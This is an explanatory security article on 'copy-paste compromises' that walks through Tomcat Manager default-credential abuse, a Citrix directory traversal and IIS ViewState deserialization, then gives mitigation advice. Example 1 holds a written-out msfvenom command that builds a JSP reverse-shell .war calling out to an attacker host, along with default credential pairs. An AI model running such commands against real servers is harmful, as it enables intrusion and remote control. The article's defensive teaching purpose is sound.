Today in This article we will cover Copy-paste compromises.
Copy-paste compromises: Introduction and overview
Although the concept of copy-paste compromises is not entirely new, there are currently several different forms of attack. In the version of the copy-and-paste compromise we’ll discuss today, attackers use open source or publicly available exploit code, web shells, and other tools to obtain information.
Recently, Australia revealed a widespread attack across all levels of government, essential service providers and private businesses across the country. Australia called the attacks “copy and paste compromises”, alluding to the discovery that the attacks used public domain exploits. Based on what was released, the attacks primarily exploited vulnerabilities in Microsoft Internet Information Services (IIS), SharePoint Vulnerability 2019, and Citrix Vulnerability 2019. These exploited vulnerabilities have patches available, meaning the attack did not require significant effort or zero-day exploits.
During their investigation, they found that most organizations vulnerable to phishing attacks struggle to keep up with critical security patches, unnecessarily exposing internal services and often leaving default credentials on vulnerable systems.
When it comes to phishing, attackers used different kinds of techniques:
- Links to websites for obtaining credentials
- Emails with links to malicious files or with a malicious file directly attached
- Links prompting users to grant Office 365 OAuth tokens to actors
- Using email tracking services to identify email opens and attract click-through events
Once initial access is achieved, the malicious actor used a mixture of open source and proprietary tools to maintain and interact with the victim’s network. Although the tools are located on the network, the actor migrates to legitimate remote accesses using stolen credentials.
Copy-paste compromises accomplished
Now we’ll show some examples of the ways in which attackers have used publicly-available exploits and carry out copy-paste compromises.
Example 1: Exploit Tomcat Manager
In this example, a remote attacker tried to determine whether the target computer was running Apache Tomcat and whether it was configured with a default login. They then tried using different default credentials for access (tomcat: cat, cat: S3cr3t, manager: manager). If the default credentials work well, this can help an attacker gain access to the remote machine’s environment.
There are many possible ways to use Tomcat Manager:
- Running verified Tomcat Manager upload code
- Generate the backdoor in .war format
- Tomcat war deployment script
- Generate a JSP web container
Now take one example:
Generate .war format backdoor
The first attacker finds out which target Apache Tomcat is running on, then tries to log in using the default credentials (tomcat: tomcat, tomcat: S3cr3t, manager: manager).
The attacker then uses MSFvenom to generate a .war format backdoor for the Java/JSP data part:
- msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.111.128.64 LPORT=1234 -f war > shell.war
After creating a shell.war file, the attacker successfully uploads that file into the Apache Tomcat application.
Once the attacker uploads the file, the attacker will see the /path entry for the malicious file in the application table. To run the .war file, the attacker must click on the path to the /.war file listed in the Applications table. Or they can directly explore http://target_IP:port/file_name.
When the attacker executes the file, he obtains a reverse TCP connection via Netcat.
Example 2: Citrix ADC and Citrix Gateway directory traversal vulnerability
Citrix Application Delivery Controller (ADC) and Citrix Gateway allowed an attacker to send directory traversal requests and successfully read sensitive data from system configuration files by bypassing authentication and remotely executing arbitrary code.
This vulnerability can be exploited if incorrect pathname handling has been configured. Assume that the system has no data sanitization check and uses the path in incoming requests without any filter. When an unsecured system receives a request, including a path such as /vpn/../vpns/services.html, the server running Citrix converts the path from /vpn/../vpns/ to /VPNs/ . This issue in the server system could allow a remote attacker to abuse directory traversal and gain access to sensitive files without authentication.
Otherwise, it could be even more dangerous. The same issue can be replicated via user input without any validation and/or sanitization. Here, the attacker with the created XML file sends it to the vulnerable server using a POST request. After the attacker makes another HTTP request and visits the rendered file, the malicious content inside the XML file executes and performs the desired task.
Below, a quick POC will show you how directory traversal requests have been successfully handled by insecure systems. Sometimes requests can give you access to sensitive files or even leak sensitive information and in the worst case, remote code execution.
Example 3: Exploitation of ViewState handling in Microsoft IIS servers
Attackers are actively exploiting a deserialization vulnerability that exists in all versions of Microsoft’s Internet Information Services (IIS) that use the .NET Framework (.NET). This vulnerability uses the ViewState parameter of a service to allow remote code execution by unauthorized users.
In order to successfully exploit this vulnerability, a malicious user must create a ViewState parameter with malicious content. Currently, the latest installations of .NET on IIS and the parameter are protected by Message Authentication Code (MAC) authentication. In order to exploit this issue, an attacker must obtain the computer key of the IIS server.
How can we reduce risk and improve security against copy-paste compromises?
Multiple controls and best practices certainly reduce the risk against Copy-Paste compromises:
Penetration tests focus on protecting your business from external and internal attackers. Most exploits do not aim to obtain financial details such as credit or debit card numbers. A penetration test can be considered a cyber security exercise to help you improve your processes and reduce the maximum risk from hackers and insiders.
Running a vulnerability scan on a schedule helps maintain patches and track new and existing vulnerabilities. You must keep in mind that not all patch management programs are effective and cannot detect any third-party software packages such as Java, PDF readers and thousands of others. Insecure configurations and default credentials make life easy for hackers; it’s an open invitation for them to gain unauthorized access.
Multiple issues can be fixed and risk minimized simply by deploying security patches in a timely manner and without granting multiple acceptances of internal risks or exceptional approval due to dependency on a legacy system. Organizations should always calculate the risk of assets before agreeing to an exceptional dependency.
Our applications and operating systems are often insecure because they use default settings to avoid hiring experts. However, this can sometimes cost the organization. Using hardening best practices can help reduce unnecessary services running as well as reduce the overall attack surface.
Passwords are traditionally considered the weakest point for abuse. Users/employees are really terrible at setting secure passwords. Many use the same passwords on multiple portals. And keeping passwords written on paper or even in a password journal can be a disaster.
This risk can be reduced by implementing a two-factor authentication process while using RSA hard/soft token, SMS OTP, certificates, biometrics and so on. (Mandatory password management systems that automatically generate complex passwords aren’t a bad idea either!)
Protecting against phishing attempts is a tricky business these days. An employee may think they are smart enough to understand and differentiate between legitimate and malicious URLs, but that is an inadequate risk mitigation plan. Taking steps such as blocking malicious or unwanted messages by running proxy software, running phishing campaigns, occasional security awareness training, and making sure new employees are aware of these concerns can help reduce risk. For example:
- Don’t click on links or open emails, messages or attachments you didn’t expect or from people or organizations you don’t know
- Be especially careful if the messages seem very attractive or offer you something.
- Before clicking on a link, you should hover over it to see the actual web address you will be redirected to. If you don’t recognize or trust the address at all, or even have any doubts, don’t click on it! It’s always a good idea to search for relevant keywords in search engines to see what comes up.
- If you are not sure about something, it is better to verify its legitimacy with the person, team, friend or family member, not through the message itself, but through independent methods (phone call, speaking in person, etc.)
- To block unwanted advertising messages, always turn on the spam filter
- Keep in mind that your financial institutions, organizations and social media will never ask you for CVV, OTP, passwords or send you a link to enter your personal or financial details, even over HTTPS.
- Always report such email to CA, administrator, HR or any other appropriate department for action
- Instead of copying and pasting links, it’s better to type them into your browser